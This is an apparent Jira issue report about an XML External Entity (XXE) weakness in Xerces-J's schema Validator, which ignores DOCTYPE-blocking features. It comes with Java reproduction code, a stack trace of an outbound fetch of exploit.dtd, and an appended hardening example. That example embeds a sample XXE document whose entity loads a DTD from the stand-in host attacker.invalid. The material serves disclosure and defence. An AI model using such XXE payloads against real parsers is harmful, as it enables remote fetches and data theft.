Posted to j-dev@xerces.apache.org by "Samuel Hailemichael (Jira)" <xe...@xml.apache.org> on 2023/07/13 18:53:00 UTC

[jira] [Created] (XERCESJ-1758) XML validator xxe vulnerability

Samuel Hailemichael created XERCESJ-1758:
--------------------------------------------

             Summary: XML validator xxe vulnerability
                 Key: XERCESJ-1758
                 URL: https://issues.apache.org/jira/browse/XERCESJ-1758
             Project: Xerces2-J
          Issue Type: Bug
          Components: JAXP (javax.xml.validation)
            Reporter: Samuel Hailemichael


During the implementation of a Validator using Apache Xerces, setting the features that prevent XML External Entity (XXE) resolution is not working. When parsing an XML file, I consistently get DNS callbacks when it attempts to load an external DTD referenced from a DOCTYPE declaration.
*Attempt 1*
{code:java}
import java.io.ByteArrayInputStream;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
// schemaSources: the Source[] of XSD files to validate against
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema(schemaSources);
Validator validator = schema.newValidator();
validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
validator.setFeature("http://xml.org/sax/features/external-general-entities", false);
validator.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte Array form that contains DOCTYPE>)));
{code}
When using a validator, it doesn't throw a fatal error exception when a document containing a DOCTYPE declaration is parsed. Here's an example of an outbound call made when an XML file containing a DOCTYPE declaration is parsed through the validator.
{code:java}
Caused by: java.io.IOException: Server returned HTTP response code: 403 for URL: https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
	at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
	at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown Source)
	at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
	at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
	at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
	at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown Source)
	at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
	at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
	at org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown Source)
	at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
	at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
	at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
	at org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source)
	at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown Source)
	at javax.xml.validation.Validator.validate(Validator.java:124) {code}
Instead of making an outbound call, it should throw an exception for the DOCTYPE declaration in the XML file.

*Attempt 2*
{code:java}
import java.io.ByteArrayInputStream;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>)));
{code}
This implementation is the recommended way to prevent external entity resolution in validators, but it gives this error when used with Xerces.
{code:java}
org.xml.sax.SAXNotRecognizedException: Property 'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
    at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown Source) {code}
--
This message was sent by Atlassian Jira
(v8.20.10#820010)

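Added example (editor's note; this is not the reporter's code and not part of Xerces itself): both attempts above hand a StreamSource to the Validator, which makes the Validator build its own internal parser, so the features and properties set on the Validator are what has to hold, and the report shows they do not. A workaround that does not depend on that path is to do the hardening on a parser you control and hand the Validator either a SAXSource carrying that pre-configured XMLReader (per the JAXP contract, a SAXSource's own XMLReader is used) or a DOMSource of a document already parsed with DOCTYPE disallowed, so that by the time validation runs there is no DTD left to resolve. The class name HardenedValidation, the sample XML with its DOCTYPE, the minimal XSD and the host attacker.invalid are all constructed for this example; nothing is meant to be fetched. This does not fix the SAXNotRecognizedException for ACCESS_EXTERNAL_DTD in Attempt 2, it sidesteps the StreamSource path that triggers it.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.Source;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.sax.SAXSource;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;

import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xml.sax.XMLReader;

public class HardenedValidation {

    // Constructed sample: a DOCTYPE whose internal subset pulls a parameter entity
    // from an external URL. The host is a placeholder and must never be contacted.
    private static final String XXE_DOC =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE note [\n"
      + "  <!ENTITY % ext SYSTEM \"http://attacker.invalid/exploit.dtd\">\n"
      + "  %ext;\n"
      + "]>\n"
      + "<note><to>x</to></note>";

    // Constructed minimal schema so the Validator has something to validate against.
    private static final String XSD =
        "<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n"
      + "  <xs:element name=\"note\"><xs:complexType><xs:sequence>\n"
      + "    <xs:element name=\"to\" type=\"xs:string\"/>\n"
      + "  </xs:sequence></xs:complexType></xs:element>\n"
      + "</xs:schema>";

    static Schema loadSchema() throws Exception {
        SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        return sf.newSchema(new StreamSource(
            new ByteArrayInputStream(XSD.getBytes(StandardCharsets.UTF_8))));
    }

    /** SAX reader with DOCTYPE rejected outright and external entities disabled. */
    static XMLReader hardenedReader() throws Exception {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setNamespaceAware(true);
        spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        spf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        return spf.newSAXParser().getXMLReader();
    }

    /** Validate through a SAXSource so the Validator reuses our reader instead of building its own. */
    static void validateWithSax(byte[] xml) throws Exception {
        Validator v = loadSchema().newValidator();
        Source src = new SAXSource(hardenedReader(), new InputSource(new ByteArrayInputStream(xml)));
        v.validate(src);
    }

    /** Parse with a hardened DOM parser first; the Validator then never sees a DOCTYPE. */
    static void validateWithDom(byte[] xml) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setNamespaceAware(true);
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        Document doc = dbf.newDocumentBuilder().parse(new ByteArrayInputStream(xml));
        loadSchema().newValidator().validate(new DOMSource(doc));
    }

    public static void main(String[] args) throws Exception {
        byte[] xml = XXE_DOC.getBytes(StandardCharsets.UTF_8);
        for (String mode : new String[] {"sax", "dom"}) {
            try {
                if (mode.equals("sax")) validateWithSax(xml); else validateWithDom(xml);
                System.out.println(mode + ": validated (DOCTYPE was NOT rejected)");
            } catch (SAXParseException e) {
                // Expected outcome: the DOCTYPE is rejected before any entity is resolved.
                System.out.println(mode + ": rejected: " + e.getMessage());
            }
        }
    }
}
```

Run it with no network access (or watch for DNS lookups of attacker.invalid) to confirm that both paths fail with a fatal parse error on the DOCTYPE rather than an IOException from an HTTP fetch, which is the observable difference from the StreamSource traces above. If the application must keep using StreamSource, the same check (no outbound request on a DOCTYPE-bearing input) is the test to add for whatever Xerces version eventually fixes this.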